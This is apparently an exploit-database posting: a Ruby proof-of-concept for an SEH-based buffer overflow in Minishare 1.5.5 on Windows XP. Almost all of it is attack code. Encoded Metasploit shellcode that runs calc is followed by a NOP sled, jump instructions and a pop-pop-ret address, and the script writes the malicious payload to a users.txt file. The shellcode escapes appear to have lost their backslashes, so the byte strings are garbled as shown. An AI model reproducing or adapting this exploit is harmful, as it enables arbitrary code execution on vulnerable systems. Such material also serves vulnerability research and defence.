minishare155seh-overflow.txt
Posted on 04 November 2010
# Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (SEH) # Date: 11/03/2010 # Author: Muhamad Fadzil Ramli - mind1355[at]gmail[dot]com # Credit/Bug Found By: Chris Gabriel # Software Link: http://sourceforge.net/projects/minishare # Version: 1.4.0 - 1.5.5 # Tested on: Windows XP SP3 EN (VMWARE FUSION - Version 3.1.1) # CVE: N/A #! /usr/bin/env ruby filename = 'users.txt' # windows/exec - 144 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc shellcode = '' shellcode << "xdbxc0x31xc9xbfx7cx16x70xcc" shellcode << "xd9x74x24xf4xb1x1ex58x31x78" shellcode << "x18x83xe8xfcx03x78x68xf4x85" shellcode << "x30x78xbcx65xc9x78xb6x23xf5" shellcode << "xf3xb4xaex7dx02xaax3ax32x1c" shellcode << "xbfx62xedx1dx54xd5x66x29x21" shellcode << "xe7x96x60xf5x71xcax06x35xf5" shellcode << "x14xc7x7cxfbx1bx05x6bxf0x27" shellcode << "xddx48xfdx22x38x1bxa2xe8xc3" shellcode << "xf7x3bx7axcfx4cx4fx23xd3x53" shellcode << "xa4x57xf7xd8x3bx83x8ex83x1f" shellcode << "x57x53x64x51xa1x33xcdxf5xc6" shellcode << "xf5xc1x7ex98xf5xaaxf1x05xa8" shellcode << "x26x99x3dx3bxc0xd9xfex51x61" shellcode << "xb6x0ex2fx85x19x87xb7x78x2f" shellcode << "x59x90x7bxd7x05x7fxe8x7bxca" nearjmp = "xe9x98xfexffxff" # near jmp 168 bytes nseh = [0xfffff9eb].pack('V') # short jmp 7 bytes seh = [0x0040B145].pack('V') # ppr junk1 = "x90" * (386 - (shellcode + nearjmp).length) junk2 = 'B' * (1000 - (junk1 + shellcode + nearjmp + nseh + seh).length) # [nops][ shellcode][near jmp][nseh (short jmp)][seh (pop pop ret)][junk2] # (3)^ (2)^_______|_______| ^ |(1) # |___________________________| |________________| xploit = junk1 + shellcode + nearjmp + nseh + seh + junk2 File.open(filename,'w') do |fd| fd.write xploit puts "file size : #{xploit.length.to_s}" end
